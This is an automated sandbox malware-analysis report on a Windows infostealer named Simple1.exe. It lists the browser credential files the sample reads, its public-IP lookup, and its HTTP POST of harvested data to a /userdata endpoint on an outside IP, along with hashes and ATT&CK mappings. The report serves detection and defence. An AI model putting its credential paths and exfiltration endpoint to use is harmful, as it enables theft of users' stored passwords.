Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Simple1.exe

Overview

General Information

Sample name:Simple1.exe
Analysis ID:1569937
MD5:218954f9dd70247e51af8a30940d5c33
SHA1:35ee01d3128951c3993079186fddc9c0dbe155f7
SHA256:95ec35703d323fe972a936d9b3574bb191e94b693656d94149897c5ff35f225f
Infos:

Detection

Score:52
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected suspicious sample
Contains functionality to steal Chrome passwords or cookies
Tries to harvest and steal browser information (history, passwords, etc)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to enumerate network shares
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Detected potential crypto function
IP address seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries information about the installed CPU (vendor, model number etc)

Classification

  • System is w10x64
  • Simple1.exe (PID: 6172 cmdline: "C:\Users\user\Desktop\Simple1.exe" MD5: 218954F9DD70247E51AF8A30940D5C33)
    • conhost.exe (PID: 2284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.2% probability
Source: Simple1.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: F:\systemConfigChecker\x64\Release\systemConfigChecker.pdb(( source: Simple1.exe
Source: Binary string: F:\systemConfigChecker\x64\Release\systemConfigChecker.pdb source: Simple1.exe
Source: C:\Users\user\Desktop\Simple1.exeCode function: 0_2_00007FF71E393CD0 memset,NetUserEnum,NetApiBufferFree,_invalid_parameter_noinfo_noreturn,??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ,??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ,0_2_00007FF71E393CD0
Source: Joe Sandbox ViewIP Address: 172.67.74.152 172.67.74.152
Source: Joe Sandbox ViewIP Address: 172.67.74.152 172.67.74.152
Source: unknownDNS query: name: api.ipify.org
Source: unknownDNS query: name: api.ipify.org
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveUser-Agent: WinHTTP/1.0Host: api.ipify.org
Source: global trafficDNS traffic detected: DNS query: api.ipify.org
Source: unknownHTTP traffic detected: POST /userdata HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=WebKitFormBoundaryUser-Agent: WinHTTP/1.0Content-Length: 97034Host: 185.237.165.97
Source: Simple1.exe, 00000000.00000002.2425067109.000001B161747000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.237.165.97/
Source: Simple1.exe, 00000000.00000002.2425067109.000001B161747000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.237.165.97/EO
Source: Simple1.exe, 00000000.00000002.2425067109.000001B16178D000.00000004.00000020.00020000.00000000.sdmp, Simple1.exe, 00000000.00000002.2425067109.000001B161774000.00000004.00000020.00020000.00000000.sdmp, Simple1.exe, 00000000.00000002.2425067109.000001B161762000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.237.165.97/userdata
Source: Simple1.exe, 00000000.00000002.2425067109.000001B16178D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.237.165.97/userdataE
Source: Simple1.exe, 00000000.00000002.2425067109.000001B16178D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.237.165.97/userdatapc
Source: Simple1.exe, 00000000.00000002.2425067109.000001B161774000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.237.165.97/userdatare
Source: Simple1.exe, 00000000.00000002.2425067109.000001B161769000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.237.165.97:80/userdataPza.
Source: Simple1.exe, 00000000.00000003.2124892163.000001B161774000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org/
Source: Simple1.exe, 00000000.00000002.2425067109.000001B161747000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org/kJ
Source: Simple1.exe, 00000000.00000003.2124892163.000001B161769000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org:80/
Source: C:\Users\user\Desktop\Simple1.exeCode function: 0_2_00007FF71E395D800_2_00007FF71E395D80
Source: C:\Users\user\Desktop\Simple1.exeCode function: 0_2_00007FF71E391B500_2_00007FF71E391B50
Source: C:\Users\user\Desktop\Simple1.exeCode function: 0_2_00007FF71E394A400_2_00007FF71E394A40
Source: C:\Users\user\Desktop\Simple1.exeCode function: 0_2_00007FF71E394E500_2_00007FF71E394E50
Source: C:\Users\user\Desktop\Simple1.exeCode function: 0_2_00007FF71E3955100_2_00007FF71E395510
Source: classification engineClassification label: mal52.spyw.winEXE@2/1@1/2
Source: C:\Users\user\Desktop\Simple1.exeCode function: 0_2_00007FF71E393780 GetLogicalDrives,memset,GetDiskFreeSpaceExA,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_K@Z,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ,??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ,0_2_00007FF71E393780
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2284:120:WilError_03
Source: Simple1.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Simple1.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: Simple1.exe, 00000000.00000003.2149587342.000001B1617F7000.00000004.00000020.00020000.00000000.sdmp, Simple1.exe, 00000000.00000003.2125611303.000001B1617D0000.00000004.00000020.00020000.00000000.sdmp, Simple1.exe, 00000000.00000003.2149587342.000001B161801000.00000004.00000020.00020000.00000000.sdmp, Simple1.exe, 00000000.00000003.2126018622.000001B1617CF000.00000004.00000020.00020000.00000000.sdmp, Simple1.exe, 00000000.00000003.2125611303.000001B1617C5000.00000004.00000020.00020000.00000000.sdmp, Simple1.exe, 00000000.00000003.2126018622.000001B1617DB000.00000004.00000020.00020000.00000000.sdmp, Simple1.exe, 00000000.00000003.2126018622.000001B1617E7000.00000004.00000020.00020000.00000000.sdmp, Simple1.exe, 00000000.00000003.2126644424.000001B1617C3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: unknownProcess created: C:\Users\user\Desktop\Simple1.exe "C:\Users\user\Desktop\Simple1.exe"
Source: C:\Users\user\Desktop\Simple1.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Simple1.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\Simple1.exeSection loaded: msvcp140.dllJump to behavior
Source: C:\Users\user\Desktop\Simple1.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\Simple1.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Users\user\Desktop\Simple1.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\Simple1.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Users\user\Desktop\Simple1.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Users\user\Desktop\Simple1.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Users\user\Desktop\Simple1.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Users\user\Desktop\Simple1.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\Simple1.exeSection loaded: samcli.dllJump to behavior
Source: C:\Users\user\Desktop\Simple1.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Users\user\Desktop\Simple1.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\Desktop\Simple1.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\Simple1.exeSection loaded: webio.dllJump to behavior
Source: C:\Users\user\Desktop\Simple1.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\Simple1.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\Simple1.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\Simple1.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\Simple1.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\Simple1.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Desktop\Simple1.exeSection loaded: samlib.dllJump to behavior
Source: C:\Users\user\Desktop\Simple1.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\Simple1.exeSection loaded: kernel.appcore.dllJump to behavior
Source: Simple1.exeStatic PE information: Image base 0x140000000 > 0x60000000
Source: Simple1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: Simple1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: Simple1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: Simple1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Simple1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: Simple1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: Simple1.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Simple1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: F:\systemConfigChecker\x64\Release\systemConfigChecker.pdb(( source: Simple1.exe
Source: Binary string: F:\systemConfigChecker\x64\Release\systemConfigChecker.pdb source: Simple1.exe
Source: Simple1.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: Simple1.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: Simple1.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: Simple1.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: Simple1.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\Simple1.exeCode function: malloc,memset,GetAdaptersInfo,malloc,GetAdaptersInfo,free,??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ,??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ,0_2_00007FF71E393AA0
Source: C:\Users\user\Desktop\Simple1.exe TID: 1476Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Simple1.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Users\user\Desktop\Simple1.exeCode function: 0_2_00007FF71E393560 GetSystemInfo,memset,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@G@Z,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@K@Z,??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ,??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ,0_2_00007FF71E393560
Source: Simple1.exe, 00000000.00000002.2425067109.000001B161747000.00000004.00000020.00020000.00000000.sdmp, Simple1.exe, 00000000.00000002.2425067109.000001B1617B3000.00000004.00000020.00020000.00000000.sdmp, Simple1.exe, 00000000.00000003.2124758080.000001B1617B3000.00000004.00000020.00020000.00000000.sdmp, Simple1.exe, 00000000.00000003.2125339912.000001B1617B3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: C:\Users\user\Desktop\Simple1.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Desktop\Simple1.exeCode function: 0_2_00007FF71E39BFAC IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF71E39BFAC
Source: C:\Users\user\Desktop\Simple1.exeCode function: 0_2_00007FF71E39C150 SetUnhandledExceptionFilter,0_2_00007FF71E39C150
Source: C:\Users\user\Desktop\Simple1.exeCode function: 0_2_00007FF71E39BFAC IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF71E39BFAC
Source: C:\Users\user\Desktop\Simple1.exeCode function: 0_2_00007FF71E39BB00 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF71E39BB00
Source: C:\Users\user\Desktop\Simple1.exeCode function: GetLocaleInfoA,GetLocaleInfoA,memset,??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ,??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z,??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ,??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UEAA@XZ,??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF71E394640
Source: C:\Users\user\Desktop\Simple1.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Users\user\Desktop\Simple1.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Users\user\Desktop\Simple1.exeCode function: 0_2_00007FF71E39C1BC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF71E39C1BC
Source: C:\Users\user\Desktop\Simple1.exeCode function: 0_2_00007FF71E394180 GetTimeZoneInformation,memset,_invalid_parameter_noinfo_noreturn,??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ,??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ,0_2_00007FF71E394180

Stealing of Sensitive Information

barindex
Source: C:\Users\user\Desktop\Simple1.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data0_2_00007FF71E395510
Source: C:\Users\user\Desktop\Simple1.exeCode function: \AppData\Local\Chromium\User Data\Default\Login Data0_2_00007FF71E395510
Source: C:\Users\user\Desktop\Simple1.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\times.jsonJump to behavior
Source: C:\Users\user\Desktop\Simple1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
Source: C:\Users\user\Desktop\Simple1.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
DLL Side-Loading
1
Process Injection
1
Virtualization/Sandbox Evasion
2
OS Credential Dumping
1
Network Share Discovery
Remote Services1
Archive Collected Data
1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading
1
Process Injection
1
Credentials In Files
2
System Time Discovery
Remote Desktop Protocol1
Data from Local System
1
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
DLL Side-Loading
Security Account Manager11
Security Software Discovery
SMB/Windows Admin SharesData from Network Shared Drive3
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDS1
Virtualization/Sandbox Evasion
Distributed Component Object ModelInput Capture3
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
Process Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials2
System Network Configuration Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync25
System Information Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://185.237.165.97/userdataE0%Avira URL Cloudsafe
http://185.237.165.97/EO0%Avira URL Cloudsafe
http://185.237.165.97/userdatapc0%Avira URL Cloudsafe
http://185.237.165.97/0%Avira URL Cloudsafe
http://185.237.165.97/userdatare0%Avira URL Cloudsafe
http://185.237.165.97:80/userdataPza.0%Avira URL Cloudsafe
http://185.237.165.97/userdata0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
api.ipify.org
172.67.74.152
truefalse
    high
    NameSourceMaliciousAntivirus DetectionReputation
    http://185.237.165.97:80/userdataPza.Simple1.exe, 00000000.00000002.2425067109.000001B161769000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://api.ipify.org/Simple1.exe, 00000000.00000003.2124892163.000001B161774000.00000004.00000020.00020000.00000000.sdmpfalse
      high
      http://185.237.165.97/userdataESimple1.exe, 00000000.00000002.2425067109.000001B16178D000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      http://api.ipify.org/kJSimple1.exe, 00000000.00000002.2425067109.000001B161747000.00000004.00000020.00020000.00000000.sdmpfalse
        high
        http://api.ipify.org:80/Simple1.exe, 00000000.00000003.2124892163.000001B161769000.00000004.00000020.00020000.00000000.sdmpfalse
          high
          http://185.237.165.97/Simple1.exe, 00000000.00000002.2425067109.000001B161747000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://185.237.165.97/userdataSimple1.exe, 00000000.00000002.2425067109.000001B16178D000.00000004.00000020.00020000.00000000.sdmp, Simple1.exe, 00000000.00000002.2425067109.000001B161774000.00000004.00000020.00020000.00000000.sdmp, Simple1.exe, 00000000.00000002.2425067109.000001B161762000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://185.237.165.97/userdatapcSimple1.exe, 00000000.00000002.2425067109.000001B16178D000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://185.237.165.97/userdatareSimple1.exe, 00000000.00000002.2425067109.000001B161774000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://185.237.165.97/EOSimple1.exe, 00000000.00000002.2425067109.000001B161747000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs
          IPDomainCountryFlagASNASN NameMalicious
          185.237.165.97
          unknownFrance
          52195AP-MEDIA-ASPLfalse
          172.67.74.152
          api.ipify.orgUnited States
          13335CLOUDFLARENETUSfalse
          Joe Sandbox version:41.0.0 Charoite
          Analysis ID:1569937
          Start date and time:2024-12-06 11:48:10 +01:00
          Joe Sandbox product:CloudBasic
          Overall analysis duration:0h 4m 53s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
          Run name:Run with higher sleep bypass
          Number of analysed new started processes analysed:5
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Sample name:Simple1.exe
          Detection:MAL
          Classification:mal52.spyw.winEXE@2/1@1/2
          EGA Information:
          • Successful, ratio: 100%
          HCA Information:
          • Successful, ratio: 100%
          • Number of executed functions: 28
          • Number of non-executed functions: 20
          Cookbook Comments:
          • Found application associated with file extension: .exe
          • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
          • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
          • Stop behavior analysis, all processes terminated
          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
          • Not all processes where analyzed, report is missing behavior information
          • Report size getting too big, too many NtReadVirtualMemory calls found.
          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
          • VT rate limit hit for: Simple1.exe
          No simulations
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          185.237.165.97Simple2.exeGet hashmaliciousUnknownBrowse
          • 185.237.165.97/userdata
          Simple2.exeGet hashmaliciousUnknownBrowse
          • 185.237.165.97/userdata
          172.67.74.152Simple2.exeGet hashmaliciousUnknownBrowse
          • api.ipify.org/
          2b7cu0KwZl.exeGet hashmaliciousUnknownBrowse
          • api.ipify.org/
          Zc9eO57fgF.elfGet hashmaliciousUnknownBrowse
          • api.ipify.org/
          67065b4c84713_Javiles.exeGet hashmaliciousRDPWrap ToolBrowse
          • api.ipify.org/
          Yc9hcFC1ux.exeGet hashmaliciousUnknownBrowse
          • api.ipify.org/
          4F08j2Rmd9.binGet hashmaliciousXmrigBrowse
          • api.ipify.org/
          y8tCHz7CwC.binGet hashmaliciousXmrigBrowse
          • api.ipify.org/
          file.exeGet hashmaliciousUnknownBrowse
          • api.ipify.org/
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          api.ipify.orgSimple2.exeGet hashmaliciousUnknownBrowse
          • 104.26.12.205
          Simple2.exeGet hashmaliciousUnknownBrowse
          • 172.67.74.152
          kYGxoN4JVW.batGet hashmaliciousUnknownBrowse
          • 172.67.74.152
          REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeGet hashmaliciousAgentTeslaBrowse
          • 104.26.13.205
          PO54782322024.exeGet hashmaliciousAgentTeslaBrowse
          • 172.67.74.152
          https://assets-gbr.mkt.dynamics.com/cc57758b-ada1-ef11-8a64-000d3a872ba0/digitalassets/standaloneforms/7608c709-85a2-ef11-8a69-7c1e5279b2ddGet hashmaliciousEvilProxy, HTMLPhisherBrowse
          • 104.26.13.205
          https://url.us.m.mimecastprotect.com/s/tWC_CNkXmJcoqkvlsmfBIyQP6j?domain=assets-gbr.mkt.dynamics.comGet hashmaliciousEvilProxy, HTMLPhisherBrowse
          • 104.26.13.205
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          AP-MEDIA-ASPLSimple2.exeGet hashmaliciousUnknownBrowse
          • 185.237.165.97
          Simple2.exeGet hashmaliciousUnknownBrowse
          • 185.237.165.97
          x86.elfGet hashmaliciousMirai, MoobotBrowse
          • 46.149.221.180
          file.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
          • 185.237.165.180
          pjczQr2H3P.exeGet hashmaliciousSocks5SystemzBrowse
          • 185.237.165.53
          9TSh73ulR1.exeGet hashmaliciousSocks5SystemzBrowse
          • 185.237.165.53
          0o37tv6BhU.elfGet hashmaliciousMiraiBrowse
          • 46.149.221.189
          CLOUDFLARENETUSPr9cqW75nY.lnkGet hashmaliciousUnknownBrowse
          • 104.18.10.207
          G3vWD786PN.lnkGet hashmaliciousUnknownBrowse
          • 104.18.11.207
          hTXtTJXdLt.lnkGet hashmaliciousUnknownBrowse
          • 104.18.11.207
          fqufh5EOJr.lnkGet hashmaliciousUnknownBrowse
          • 104.18.11.207
          NGVW0QXQSn.lnkGet hashmaliciousUnknownBrowse
          • 104.18.11.207
          EU2Yvx0L9q.lnkGet hashmaliciousUnknownBrowse
          • 104.18.11.207
          0XyV1vWJn6.lnkGet hashmaliciousUnknownBrowse
          • 104.18.11.207
          file.exeGet hashmaliciousLummaC StealerBrowse
          • 104.21.16.9
          QD40FIJ8QK.lnkGet hashmaliciousUnknownBrowse
          • 104.17.112.233
          No context
          No context
          Process:C:\Users\user\Desktop\Simple1.exe
          File Type:ASCII text, with CRLF line terminators
          Category:dropped
          Size (bytes):990
          Entropy (8bit):4.8184510556594695
          Encrypted:false
          SSDEEP:24:8E5Kk89K5K889KM89LYeb89KDWD89MLFpLK+89r9H+3X6nck:8EUksKU8sKMsLDbsKDWDsgFdK+sF+3Xq
          MD5:FBECB45D903551F94C3A95B7EEBDB7E8
          SHA1:A3BF658F1E13A4DC965362539F393BE4669D92BF
          SHA-256:EDE965AD7144AB6AEEB6B689F76B0810683A438A2C2D78AC3AB865706D802A2C
          SHA-512:3CDA26D47F631860AB26696394330C48B2E58906B9F51C178397FB28743C368E49CDA0CA7FBD2B51458F4A65AC1F990D1B58D7BAF18C5D9CE8329F9D378B54F4
          Malicious:false
          Reputation:low
          Preview:File is found: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data..File not found: C:\Users\user\AppData\Local\Google\Chrome Beta\User Data\Default\Login Data..File not found: C:\Users\user\AppData\Local\Chromium\User Data\Default\Login Data..File is found: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data..File not found: C:\Users\user\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Login Data..File not found: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data..File not found: C:\Users\user\AppData\Roaming\Opera Software\Opera GX Stable\Login Data..File not found: C:\Users\user\AppData\Local\Yandex\YandexBrowser\User Data\Default\Login Data..File not found: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json..File is found: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\times.json..?? ??????? ???????? ????? ?? ???????...
          File type:PE32+ executable (console) x86-64, for MS Windows
          Entropy (8bit):5.9784256378182175
          TrID:
          • Win64 Executable Console (202006/5) 92.65%
          • Win64 Executable (generic) (12005/4) 5.51%
          • Generic Win/DOS Executable (2004/3) 0.92%
          • DOS Executable Generic (2002/1) 0.92%
          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
          File name:Simple1.exe
          File size:81'920 bytes
          MD5:218954f9dd70247e51af8a30940d5c33
          SHA1:35ee01d3128951c3993079186fddc9c0dbe155f7
